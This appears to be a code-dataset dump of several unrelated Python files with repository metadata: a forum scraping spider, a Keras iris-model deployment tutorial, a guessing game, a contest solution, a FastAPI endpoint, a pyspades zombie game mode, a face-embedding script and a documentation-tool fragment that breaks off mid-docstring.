repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
sequence | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
defchen/LearningPython | 850,403,574,402 | 6c6d6adf8bb666987fe66f6fccbd517d0d402fd4 | 061fa1504d59e24bc379c4c91670f926aa516d07 | /learning/spider/spider_to_1024.py | 29d2d579f17ade1d2f38a0c8b5056246a91167ed | [] | no_license | https://github.com/defchen/LearningPython | a5189c643fee667e0705bce24e385bf7e4288ae5 | eaae52dd7aef3ba97b333b784f2fcf8b9ba5002b | refs/heads/master | 2021-01-22T10:46:34.776815 | 2017-02-15T07:53:31 | 2017-02-15T07:53:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
@Author: liujinjia
@Date: 2017-02-15 13:52:42
@Project : LearningPython
@File : spider_to_1024.py
@Last Modified by: liujinjia
@Last Modified time: 2017-02-15 15:49:05
"""
import requests
from bs4 import BeautifulSoup
class Spider:
""" 1024 img spider """
start_url = 'http://www.dxlymm.com/thread0806.php?fid=5'
session = requests.Session()
@classmethod
def get_home_page(cls, url=None):
""" get 1024 img page """
if url is None:
page = cls.session.get(cls.start_url)
else:
page = cls.session.get(url)
page.encoding = 'gbk'
return page.text
@classmethod
def parse_pages(cls):
""" parse 1024 pages """
parse = BeautifulSoup(cls.get_home_page(), 'lxml')
parse = parse.findAll('tr')
return parse
@classmethod
def get_uri_list(cls):
""" get parse list url """
uri_list = []
for item in cls.parse_pages():
if item.h3 is not None:
# print(item.h3.a.get('href'), item.h3.a.string)
uri_list.append("http://www.dxlymm.com/" + item.h3.a.get('href'))
return uri_list
@classmethod
def get_seed_page(cls):
""" get pages seeds """
page = cls.get_home_page(cls.get_uri_list()[11])
return BeautifulSoup(page, 'lxml').find('a', {"target": "_blank"}).string
@classmethod
def get_seed(cls):
""" get seeds
http://www.rmdown.com/download.php?ref=163b9b55fba74fbc988124acb4db8b23bbc739bf55e&reff=MTQ4NzE0NDcwOA%3D%3D&submit=download
this func get some element
<INPUT size=58 name="ref" value="163b9b55fba74fbc988124acb4db8b23bbc739bf55e"
style="font-size:10px;"><INPUT TYPE="hidden" NAME="reff" value="MTQ4NzE0NDU2Nw=="><BR>
get this tags , value and value splicing into url, download seeds!
"""
page = cls.get_home_page(cls.get_seed_page())
print(page)
if __name__ == '__main__':
print(Spider.get_seed())
| UTF-8 | Python | false | false | 2,033 | py | 3 | spider_to_1024.py | 3 | 0.596353 | 0.54066 | 0 | 67 | 29.268657 | 132 |
IsaacYAGI/python-ejercicios | 2,327,872,276,990 | 8498ba69e4cc5c5f480644ac20d878fb2a632bee | 50b69776bee7ad3a6068235c6c8981c06a17629a | /tema39-biblioteca-estandar-python/ejercicios-propuestos/ejercicio_propuestos1_tema39.py | aec8b8678f361a8deff93de03c4eb45b80a56732 | [] | no_license | https://github.com/IsaacYAGI/python-ejercicios | 665db9b6286d4840e8fa9c2d9b42b1389753b806 | fe8d9b96a7e947dd3fa992dfac39049fa68935c5 | refs/heads/master | 2021-06-04T11:03:53.466163 | 2017-07-29T03:17:15 | 2017-07-29T03:17:15 | 98,049,960 | 3 | 3 | null | false | 2021-02-24T05:07:15 | 2017-07-22T18:20:42 | 2017-07-22T20:33:05 | 2021-02-24T05:06:37 | 23 | 0 | 1 | 0 | Python | false | false | '''
Confeccionar un programa que genere un número aleatorio entre 1 y 100 y no se muestre.
El operador debe tratar de adivinar el número ingresado.
Cada vez que ingrese un número mostrar un mensaje "Gano" si es igual al generado o "El número aleatorio el mayor" o "El número aleatorio es menor".
Mostrar cuando gana el jugador cuantos intentos necesitó.
'''
import random
def generar_numero_aleatorio():
return random.randint(1,100)
def es_el_numero(resp_usuario,resp_correc):
return resp_usuario == resp_correc
def numero_dado_es_mayor(resp_usuario,resp_correc):
return resp_usuario > resp_correc
def juego_terminado(numero_correcto,numero_intentos):
print("El juego ha terminado!")
print("El numero correcto era",numero_correcto,"y lo resolviste en",numero_intentos,"intentos.",sep=" ")
def el_numero_es_mayor():
print("El numero que diste es mayor al correcto, intenta de nuevo!")
def el_numero_es_menor():
print("El numero que diste es menor al correcto, intenta de nuevo!")
def iniciar_juego():
gano = False
intentos = 1
numero = 0
respuesta_correc = generar_numero_aleatorio()
while (not gano):
numero = int(input("Ingresa un numero: "))
if (es_el_numero(numero,respuesta_correc)):
juego_terminado(respuesta_correc,intentos)
gano = True
else:
if (numero_dado_es_mayor(numero,respuesta_correc)):
el_numero_es_mayor()
else:
el_numero_es_menor()
intentos += 1
iniciar_juego()
| UTF-8 | Python | false | false | 1,588 | py | 30 | ejercicio_propuestos1_tema39.py | 29 | 0.663717 | 0.656764 | 0 | 54 | 28.259259 | 147 |
jordanfalcao/tensorflow2-deeplearning | 7,756,710,980,553 | e491237e5c49d13e4363c4bcd0dd5fda87ca745f | 6c64e6c286db85d8f57cdaf79f2e3a6109209bb2 | /10-Deployment/01_my_basic_model.py | 3aecceebbd6e086c156880dfb63e41bee7287843 | [] | no_license | https://github.com/jordanfalcao/tensorflow2-deeplearning | 0f929a6429057c3da19e382245ab493e08b0c18a | 2d88d4cb888226cfda7ac4c163fceb452aba103a | refs/heads/main | 2023-07-10T17:58:09.864395 | 2021-08-19T23:29:00 | 2021-08-19T23:29:00 | 383,968,761 | 0 | 0 | null | false | 2021-08-05T22:44:38 | 2021-07-08T01:34:38 | 2021-08-04T19:42:33 | 2021-08-05T22:44:37 | 36,592 | 0 | 0 | 0 | Jupyter Notebook | false | false | # -*- coding: utf-8 -*-
"""01-My-Basic-Model.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1mwM8WLV4fZGkmgwC4EVh91Hfz2bqfUR9
# DEPLOYMENT
**Welcome to deployment section! In this section of the course, we will go through the entire deployment process, starting as if you had to create a servicable model from scratch, then deploy it for others to use, either through API or a web form.**
# Data
For this example we use the very common data set: [iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set), which is about flowers.
From Wikipedia:
The Iris flower data set or Fisher's Iris data set is a multivariate data set introduced by the British statistician and biologist Ronald Fisher in his 1936 paper The use of multiple measurements in taxonomic problems as an example of linear discriminant analysis.[1] It is sometimes called Anderson's Iris data set because Edgar Anderson collected the data to quantify the morphologic variation of Iris flowers of three related species.[2] Two of the three species were collected in the Gaspé Peninsula "all from the same pasture, and picked on the same day and measured at the same time by the same person with the same apparatus".[3]
The data set consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor). Four features were measured from each sample: the length and the width of the sepals and petals, in centimeters.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
iris = pd.read_csv("iris.csv")
iris.head()
"""## Data Processing
### Features and Target
"""
X = iris.drop('species',axis=1)
y = iris['species']
y.unique()
# Lots of ways to one hot encode
# https://stackoverflow.com/questions/47573293/unable-to-transform-string-column-to-categorical-matrix-using-keras-and-sklearn
# https://stackoverflow.com/questions/35107559/one-hot-encoding-of-string-categorical-features
from sklearn.preprocessing import LabelBinarizer
encoder = LabelBinarizer()
y = encoder.fit_transform(y)
y[45:55]
"""## Train Test Split"""
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101)
"""### Scaling"""
scaler = MinMaxScaler()
scaler.fit(X_train)
scaled_X_train = scaler.transform(X_train)
scaled_X_test = scaler.transform(X_test)
"""## Model
### Creating the Model
"""
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
model = Sequential()
model.add(Dense(units=4,activation='relu',input_shape=[4,]))
# Last layer for multi-class classification of 3 species
model.add(Dense(units=3,activation='softmax'))
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
"""## Model Training"""
from tensorflow.keras.callbacks import EarlyStopping
early_stop = EarlyStopping(patience=10)
# model.fit(x=scaled_X_train,
# y=y_train,
# epochs=300,
# validation_data=(scaled_X_test, y_test), verbose=1 ,callbacks=[early_stop])
"""## Model Evaluation"""
metrics = pd.DataFrame(model.history.history)
metrics.head()
metrics[['loss','val_loss']].plot()
plt.show()
metrics[['accuracy','val_accuracy']].plot()
plt.show()
model.evaluate(scaled_X_test,y_test,verbose=0)
"""## Ready Model for Deployment"""
epochs = len(metrics)
# all the data
scaled_X = scaler.fit_transform(X)
model = Sequential()
model.add(Dense(units=4,activation='relu'))
# Last layer for multi-class classification of 3 species
model.add(Dense(units=3,activation='softmax'))
model.compile(optimizer='adam',
loss='categorical_crossentropy',metrics=['accuracy'])
model.fit(scaled_X,y,epochs=epochs)
model.evaluate(scaled_X_test,y_test,verbose=0)
model.save("final_iris_model.h5")
"""### Saving Scaler"""
import joblib
joblib.dump(scaler,'iris_scaler.pkl')
"""## Predicting a Single New Flower"""
from tensorflow.keras.models import load_model
flower_model = load_model("final_iris_model.h5")
flower_scaler = joblib.load("iris_scaler.pkl")
iris.head(1)
flower_example = {'sepal_length':5.1,
'sepal_width':3.5,
'petal_length':1.4,
'petal_width':0.2}
flower_example.keys()
encoder.classes_
def return_prediction(model,scaler,sample_json):
# For larger data features, you should probably write a for loop
# That builds out this array for you
s_len = sample_json['sepal_length']
s_wid = sample_json['sepal_width']
p_len = sample_json['petal_length']
p_wid = sample_json['petal_width']
flower = [[s_len,s_wid,p_len,p_wid]]
flower = scaler.transform(flower)
classes = np.array(['setosa', 'versicolor', 'virginica'])
class_ind = np.argmax(model.predict(flower), axis=-1)
# deprecated
# class_ind = model.predict_classes(flower)
return classes[class_ind][0]
# calling the fuction
return_prediction(flower_model,flower_scaler,flower_example) | UTF-8 | Python | false | false | 5,143 | py | 70 | 01_my_basic_model.py | 36 | 0.720537 | 0.706145 | 0 | 186 | 26.650538 | 636 |
takecian/ProgrammingStudyLog | 13,984,413,562,158 | 46099aa352116e9ec26130b601e61b559c60c7fe | bde6ed092b7b29703737e11c5a5ff90934af3d74 | /AtCoder/typical_dp/006c.py | 2e87c3a9bfb5a07e9b900a274e0044898c002dc6 | [] | no_license | https://github.com/takecian/ProgrammingStudyLog | 2ab7ea601e0996b3fa502b81ec141bc3772442b6 | 94485d131c0cc9842f1f4799da2d861dbf09b12a | refs/heads/master | 2023-04-28T16:56:18.943574 | 2023-04-18T06:34:58 | 2023-04-18T06:34:58 | 128,525,713 | 4 | 0 | null | false | 2022-12-09T06:15:19 | 2018-04-07T12:21:29 | 2022-07-04T14:37:10 | 2022-12-09T06:15:18 | 18,241 | 3 | 0 | 7 | Python | false | false | # https://beta.atcoder.jp/contests/abc006/tasks/abc006_3
# a + b + c = N
# 2a + 3b + 4c = M
N, M = map(int, input().split())
#
# ans_a = -1
# ans_a = -1
# ans_a = -1
#
# for a in range(N+1):
# rest = N - a
# for b in range(rest+1):
# c = rest - b
# if c < 0:
# break
# if 2 * a + 3 * b + 4 * c == M:
# print(str(a) + ' ' + str(b) + ' ' + str(c) + '\n')
# exit(0)
#
# print('-1 -1 -1\n')
#
# in case of 0 elder person
# a + c = N
# 2a + 4c = M
if M % 2 == 0:
a = 2 * N - M // 2
c = M // 2 - N
if a >= 0 and c >= 0:
print(str(a) + ' 0 ' + str(c) + '\n')
exit(0)
if M % 2 == 1:
a = 2 * N - (M + 1) // 2
c = -N + (M - 1) // 2
if a >= 0 and c >= 0:
print(str(a) + ' 1 ' + str(c) + '\n')
exit(0)
print('-1 -1 -1\n')
# in case of 1 elder person
# a + c = N - 1
# 2a + 4c = M - 3
| UTF-8 | Python | false | false | 902 | py | 883 | 006c.py | 861 | 0.370288 | 0.310421 | 0 | 46 | 18.608696 | 64 |
sntzhd/sntzhd_back | 5,617,817,273,287 | a3b60d92805b9955365f9eccdc031a62f67b9ee2 | 8424f7ca88935497df49544e60e9ed48a6243e0e | /backend_api/indication/endpoints.py | b15d252109df992eaa34b10641e96eede5b7ae34 | [] | no_license | https://github.com/sntzhd/sntzhd_back | 622996d0ea917f4a24fbb74620fb130266979078 | 13128989bd53657d55c5154f56e56a5944f7b771 | refs/heads/master | 2023-05-24T09:25:05.120897 | 2021-06-13T11:16:58 | 2021-06-13T11:16:58 | 367,019,313 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fastapi import Depends, FastAPI, HTTPException, APIRouter
from backend_api.db.sql_app import crud, database, models, schemas
from backend_api.db.sql_app.database import db_state_default
database.db.connect()
database.db.create_tables([models.Item])
database.db.close()
router = APIRouter()
async def reset_db_state():
database.db._state._state.set(db_state_default.copy())
database.db._state.reset()
def get_db(db_state=Depends(reset_db_state)):
try:
database.db.connect()
yield
finally:
if not database.db.is_closed():
database.db.close()
@router.post(
"/items/",
response_model=schemas.ItemBase,
dependencies=[Depends(get_db)],
)
def create_item_for_user(item: schemas.ItemBase):
return crud.create_item(item=item) | UTF-8 | Python | false | false | 796 | py | 37 | endpoints.py | 32 | 0.69598 | 0.69598 | 0 | 31 | 24.709677 | 66 |
EmaSMach/info2020 | 12,970,801,279,010 | 8e13fbe8b71dccad22b43ca25bbdb368d8776d0a | fdb8d96d06cb7e74153a178fd17b449e89f44cd0 | /desafios/complementarios/condicionales/desafio16_descuento_camisas.py | 1183312cd82977baba879c036daddeb3c2dd341f | [] | no_license | https://github.com/EmaSMach/info2020 | c84916521d2dd21040419cb469c76c589b98be89 | a184dc376cb5e0b894a32d01681b71c824d993d3 | refs/heads/master | 2022-12-06T08:52:34.994922 | 2020-08-24T02:57:40 | 2020-08-24T02:57:40 | 273,131,222 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Desafío 16
# Hacer un programa que calcule el total a pagar por la compra de camisas.
# Si se compran tres camisas o mas se aplica un descuento del 20% sobre el
# total de la compra y si son menos de tres camisas un descuento del 10%.
cantidad_camnisas = int(input("Camisas Compradas: "))
precio_camisa = float(input("Precio camisa: "))
if cantidad_camnisas >= 3:
descuento = 20
else:
descuento = 10
subtotal = precio_camisa * cantidad_camnisas
print(f"Total a pagar: $ {subtotal - (subtotal*descuento/100)}")
| UTF-8 | Python | false | false | 528 | py | 67 | desafio16_descuento_camisas.py | 67 | 0.719165 | 0.6926 | 0 | 17 | 30 | 75 |
Colorpinpoint/pyspades-userscripts | 8,486,855,423,698 | 7d1293b78c5de507e828d9512a246869993c9615 | 87df4bda6d6da9b1ce0360328a372c54037e4264 | /zombies.py | c6ed0877c75ab263f9846bbed0182904367f4b8f | [] | no_license | https://github.com/Colorpinpoint/pyspades-userscripts | 58910c3ca3c3b31d5f9c8d76b5a55e97c083fd10 | e0c24f10312d9f72031723747c48fbd456e780bf | refs/heads/master | 2016-10-10T11:35:46.593848 | 2012-07-30T03:23:18 | 2012-07-30T03:23:18 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pyspades.server import orientation_data, grenade_packet, weapon_reload, set_tool
from pyspades.common import coordinates, Vertex3
from pyspades.world import Grenade
from commands import add, admin
from math import sin, floor, atan2
from pyspades.constants import *
from pyspades.server import block_action
from pyspades.collision import distance_3d
from twisted.internet.task import LoopingCall
HEAL_RATE = 1000
HUMAN = 1
ZOMBIE = 2
# ZOMBIE_HUMAN = HUMAN | ZOMBIE
S_ZOMBIE_VERSION = 'Zombies 1.1.0 RC1 by Dany0, infogulch'
S_ZOMBIE_HEALTH = 'Zombie health is %i.'
S_ZOMBIE_TELEPORT = 'Zombies teleport %i blocks high.'
S_ZOMBIE_SPAWN = 'Zombies spawn %i blocks high.'
S_ZOMBIE_STAT = S_ZOMBIE_HEALTH + ' ' + S_ZOMBIE_TELEPORT + ' ' + S_ZOMBIE_SPAWN
@admin
def zhp(connection, value):
if value == 0:
a = True
protocol = connection.protocol
protocol.ZOMBIE_HP = abs(float(value))
connection.send_chat(S_ZOMBIE_HEALTH % value)
@admin
def ztel(connection, value):
protocol = connection.protocol
val = abs(int(value))
protocol.ZOMBIE_TELEPORT = val
connection.send_chat(S_ZOMBIE_TELEPORT % val)
@admin
def zspawnheight(connection, value):
protocol = connection.protocol
val = abs(int(value))
if val >= 10:
protocol.ZOMBIE_SPAWN_HEIGHT = val
connection.send_chat(S_ZOMBIE_SPAWN % val)
elif val < 10:
protocol.ZOMBIE_SPAWN_HEIGHT = 0
connection.send_chat('Disabling zombie spawning up in the air')
def zombiestat(connection):
connection.send_chat(S_ZOMBIE_VERSION)
connection.send_chat(S_ZOMBIE_STAT % (connection.protocol.ZOMBIE_HP, connection.protocol.ZOMBIE_TELEPORT))
add(ztel)
add(zhp)
add(zombiestat)
add(zspawnheight)
def apply_script(protocol, connection, config):
class ZombiesProtocol(protocol):
def __init__(self, *arg, **kw):
protocol.__init__(self, *arg, **kw)
self.ZOMBIE_TELEPORT = 17
self.ZOMBIE_HP = 650
self.ZOMBIE_SPAWN_HEIGHT = 0
class ZombiesConnection(connection):
zombies_playermode = 0 #must be a class instance variable to overload connection.refill()
def on_spawn(self, pos):
if self.team is self.protocol.green_team:
# once spawned, human-zombies turn back into zombies
self.zombies_playermode = ZOMBIE
self.health_message = False
self.quickbuild_allowed = False
self.clear_ammo()
## this makes zombies appear to have a weapon when they have a block
# set_tool.player_id = self.player_id
# set_tool.value = SPADE_TOOL
# self.protocol.send_contained(set_tool, sender = self)
if self.protocol.ZOMBIE_SPAWN_HEIGHT > 0:
player_location = self.world_object.position
loc = (player_location.x, player_location.y, player_location.z - self.protocol.ZOMBIE_SPAWN_HEIGHT)
self.set_location_safe(loc)
else:
self.zombies_playermode = HUMAN
self.health_message = True
self.quickbuild_allowed = True
return connection.on_spawn(self, pos)
def create_explosion_effect(self, position):
self.protocol.world.create_object(Grenade, 0.1, position, None, Vertex3(), None)
grenade_packet.value = 0.0
grenade_packet.player_id = 32
grenade_packet.position = position.get()
grenade_packet.velocity = (0.0, 0.0, 0.0)
self.protocol.send_contained(grenade_packet)
def on_line_build_attempt(self, points):
if self.zombies_playermode == ZOMBIE:
return False
return connection.on_line_build_attempt(points)
def on_block_build_attempt(self, x, y, z):
if self.zombies_playermode == ZOMBIE:
return False
return connection.on_block_build_attempt(self, x, y, z)
def on_block_destroy(self, x, y, z, value):
if (self.zombies_playermode == ZOMBIE and value == DESTROY_BLOCK and self.tool == SPADE_TOOL):
map = self.protocol.map
ztel = self.protocol.ZOMBIE_TELEPORT
player_location = self.world_object.position
px, py, pz = player_location.x, player_location.y, player_location.z
if (not map.get_solid(px, py, pz-ztel+1)
and not map.get_solid(px, py, pz-ztel+2)
and not map.get_solid(px, py, pz-ztel+3)):
self.create_explosion_effect(player_location)
self.set_location((px, py, pz - ztel))
return connection.on_block_destroy(self, x, y, z, value)
def on_flag_capture(self):
if self.team is self.protocol.green_team:
self.zombies_playermode = HUMAN
self.refill()
self.send_chat('YOU ARE HUMAN NOW RAWR GO SHOOT EM')
self.protocol.send_chat('%s has become a human-zombie and can use weapons!' % self.name)
return connection.on_flag_capture(self)
def on_flag_take(self):
if self.team is self.protocol.blue_team:
self.set_hp(self.hp*2)
else:
self.set_hp(self.hp/1.6)
return connection.on_flag_take(self)
def on_grenade(self, time_left):
if self.zombies_playermode == ZOMBIE:
self.send_chat("Zombie! You fool! You forgot to unlock the pin! It's useless now!")
return False
return connection.on_grenade(self, time_left)
def on_hit(self, hit_amount, hit_player, type, grenade):
new_hit = connection.on_hit(self, hit_amount, hit_player, type, grenade)
if new_hit is not None:
return new_hit
other_player_location = hit_player.world_object.position
other_player_location = (other_player_location.x, other_player_location.y, other_player_location.z)
player_location = self.world_object.position
player_location = (player_location.x, player_location.y, player_location.z)
dist = floor(distance_3d(player_location, other_player_location))
damagemulti = (sin(dist/80))+1
new_hit = hit_amount * damagemulti
if self is hit_player:
if type == FALL_KILL:
return False
elif hit_player.zombies_playermode == ZOMBIE and self.weapon == SMG_WEAPON:
new_hit = (new_hit/(self.protocol.ZOMBIE_HP/100))
if new_hit >=25:
self.create_explosion_effect(hit_player.world_object.position)
self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!")
elif hit_player.zombies_playermode == ZOMBIE and self.weapon != SMG_WEAPON:
if self.weapon == SHOTGUN_WEAPON:
new_hit = new_hit/(self.protocol.ZOMBIE_HP/100)/8
else:
new_hit = new_hit/(self.protocol.ZOMBIE_HP/100)
if new_hit >=25:
self.create_explosion_effect(hit_player.world_object.position)
self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!")
elif self.zombies_playermode == ZOMBIE and type != MELEE_KILL:
return False #this should never happen, but just in case
elif (self.team is self.protocol.blue_team and self.team == hit_player.team and
type == MELEE_KILL):
if hit_player.hp >= 100:
if self.health_message == True:
self.health_message = False
self.send_chat(hit_player.name + ' is at full health.')
elif hit_player.hp > 0:
hit_player.set_hp(hit_player.hp + HEAL_RATE)
return new_hit
def on_kill(self, killer, type, grenade):
if killer != None and killer != self:
if killer.zombies_playermode == HUMAN:
killer.refill()
killer.send_chat('You have been refilled!')
else:
self.send_chat('THE ZOMBIES ARE COMING RAWRRR')
killer.set_hp(killer.hp + 25 - killer.hp/10)
return connection.on_kill(self, killer, type, grenade)
def clear_ammo(self):
weapon_reload.player_id = self.player_id
weapon_reload.clip_ammo = 0
weapon_reload.reserve_ammo = 0
self.weapon_object.clip_ammo = 0
self.weapon_object.reserve_ammo = 0
self.send_contained(weapon_reload)
def refill(self, local = False):
connection.refill(self, local)
if self.zombies_playermode == ZOMBIE:
self.clear_ammo()
def on_login(self, name):
protocol = self.protocol
self.send_chat(S_ZOMBIE_STAT % (protocol.ZOMBIE_HP, protocol.ZOMBIE_TELEPORT, protocol.ZOMBIE_SPAWN_HEIGHT))
return connection.on_login(self, name)
return ZombiesProtocol, ZombiesConnection | UTF-8 | Python | false | false | 9,454 | py | 5 | zombies.py | 4 | 0.576687 | 0.568542 | 0 | 212 | 43.599057 | 120 |
newasu/FaceRecognitionPython | 11,957,188,952,317 | 2692af2249efecee8bd76aebecd71882c942d08e | db6ba700742584d71bd2f9f1d66627060235bb49 | /Scripts/testscript_11.py | c909039f83568b5e7a7f880f21920b507cd34489 | [] | no_license | https://github.com/newasu/FaceRecognitionPython | 27119747e53975a4c19fcf4b89682a4df7498606 | 536bcfeb852fd1c4f93b59636fbb6182b5e9996f | refs/heads/master | 2021-07-21T05:20:40.363671 | 2021-02-01T08:38:04 | 2021-02-01T08:38:04 | 237,888,319 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Add project path to sys
import sys
sys.path.append("./././")
# Import lib
import pandas as pd
import numpy as np
import os
import glob
import cv2
from mtcnn.mtcnn import MTCNN
import tensorflow as tf
from keras_vggface.vggface import VGGFace
from keras_vggface import utils
# Import my own lib
import others.utilities as my_util
gpu_id = 0
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
# Clear GPU cache
tf.keras.backend.clear_session()
gpus = tf.config.experimental.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(gpus[0], True)
#############################################################################################
# Path
# Dataset path
lfw_test_cleaned_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cleaned'])
lfw_test_crop_face_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cropped'])
# Make directory
my_util.make_directory(lfw_test_crop_face_path)
#############################################################################################
# Initialise dataframe
my_column_names = ['gender', 'ethnicity', 'id', 'pose', 'path']
my_data = pd.DataFrame(columns=my_column_names)
# List files
dir_list = glob.glob(lfw_test_cleaned_path + '*/*')
i = 0
for fp in dir_list:
# print(str(i))
i = i+1
# Get path
my_path = fp
my_dir, my_filename = os.path.split(my_path)
# Extract class
my_dir = my_dir.split('/')[-1]
my_gender, my_ethnicity = my_dir.split('-')
# Extract ID
my_filename = my_filename.split('.')[0]
tmp = my_filename.rfind('_')
my_id = my_filename[0:tmp]
my_pose = int(my_filename[tmp+1:])
# Append
my_data = my_data.append({'gender':my_gender, 'ethnicity':my_ethnicity, 'id':my_id, 'pose':my_pose, 'path':my_path}, ignore_index=True)
# Sort
my_data = my_data.sort_values(by=['id', 'pose'], ignore_index=True)
# Unique
id_unique = my_data['id'].unique()
# Check correction
for id_u in id_unique:
tmp = my_data[my_data['id'] == id_u][['gender', 'ethnicity']]
if tmp['gender'].unique().size > 1 or tmp['ethnicity'].unique().size > 1:
print(id_u)
# Initialise pretrained
pretrained_model = VGGFace(model = 'resnet50')
feature_layer = tf.keras.layers.Flatten(name='flatten')(pretrained_model.get_layer('avg_pool').output)
model = tf.keras.models.Model(pretrained_model.input, feature_layer)
# Detect face
exacted_data = np.empty((0, 2048))
detector = MTCNN()
for img_idx in range(0,my_data.shape[0]):
print(str(img_idx))
# Load image
img = cv2.cvtColor(cv2.imread(my_data['path'][img_idx]), cv2.COLOR_BGR2RGB)
faces = detector.detect_faces(img)
# Select biggest face
face_idx = 0
if len(faces) > 1:
facesize = []
for face in faces:
_, _, width, height = face['box']
facesize.append(width*height)
face_idx = np.argmax(facesize)
# Crop face
bbox = np.array(faces[face_idx]['box'])
bbox[bbox<0] = 0
x1, y1, width, height = bbox
x2, y2 = x1 + width, y1 + height
img = img[y1:y2, x1:x2]
# Convert color space
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
# Extract feature by pretrained
img = cv2.resize(img, (224,224))
img = tf.keras.preprocessing.image.img_to_array(img)
img = np.expand_dims(img, axis=0)
img = utils.preprocess_input(img, version=2) # vgg = 1, resnet = 2
feature_embedding = model.predict(img)
exacted_data = np.vstack((exacted_data, feature_embedding))
# Save img
# cv2.imwrite((lfw_test_crop_face_path + '/' + my_data.id.iloc[img_idx] + '_' + str(my_data.pose.iloc[img_idx]).zfill(4)) + '.jpg', img)
# Concatenate
my_data_columns = my_column_names
my_data_columns = np.array(my_data_columns)
my_data_columns = np.append(my_data_columns, np.char.add(np.tile('feature_', (2048)), np.array(range(1, 2048+1)).astype('U')))
my_data = np.concatenate((my_data.values, exacted_data), axis=1)
my_data = pd.DataFrame(my_data, columns=my_data_columns)
# Save
my_data.to_csv('DevTest_cleaned.txt', header=True, index=False, sep=' ')
print()
| UTF-8 | Python | false | false | 4,195 | py | 55 | testscript_11.py | 52 | 0.626222 | 0.610727 | 0 | 129 | 31.51938 | 155 |
coreygirard/harbor | 1,374,389,557,538 | 8875bbcb2bd4c9233439d324a82aa844ff0ef69f | 7725ec91175db3e86edf0c5396f0b0dcc680ada1 | /harbor/src/outline.py | 21269e9c931db22a31f2a55923030bd0a170582a | [] | no_license | https://github.com/coreygirard/harbor | c4bf7829cd3cf5dca61f437321912c90a5a9988c | 6ab255562e200eb47f6262e48e0b55978d83fd59 | refs/heads/master | 2021-09-28T16:29:14.407065 | 2018-11-18T08:16:56 | 2018-11-18T08:16:56 | 113,496,312 | 8 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''harbor: readme/how/outline
{
OUTLINE
readme: README.md
badges
what
why
how
intro
outline
patterns
todo
PATTERNS
title:
# {title}
section:
### {section}
}[code]
{The outline section of the `.harbor` file must be preceded by `OUTLINE`.
This section specifies the names of the files to be generated, and their internal
structure}[p]
'''
def extractOutline(text):
'''
>>> text = ['OUTLINE',
... 'aaa',
... 'bbb',
... 'ccc',
... '',
... 'PATTERNS',
... 'ddd',
... 'eee',
... 'fff',
... '']
>>> extractOutline(text)
['aaa', 'bbb', 'ccc', '']
'''
assert(text.count('OUTLINE') <= 1)
assert(text.count('PATTERNS') <= 1)
if 'OUTLINE' in text:
text = text[text.index('OUTLINE')+1:]
if 'PATTERNS' in text:
text = text[:text.index('PATTERNS')]
return text
'''harbor: readme/how/outline
{Each line in the `OUTLINE` section without indentation denotes a file. The form is `aaa: bbb`,
where `aaa` is the nickname for the file, and `bbb` is the actual filename to use when saving
the generated documentation.}[p]
{Basic outline indentation rules apply, with regard to how nesting works. The sections can have
arbitrary names, excluding spaces. Best practice for multi-word sections is Lisp-style naming:
`another-section` or `this-is-a-wordy-label`.}[p]
'''
def getOutline(i):
'''
>>> raw = [['OUTLINE',
... 'readme: README.md',
... ' aaa',
... ' bbb',
... ' ccc',
... ' ddd',
... ' eee',
... ' fff'],
... ['OUTLINE',
... 'quickstart: quickstart.md',
... ' step-1',
... ' step-2',
... ' step-3']]
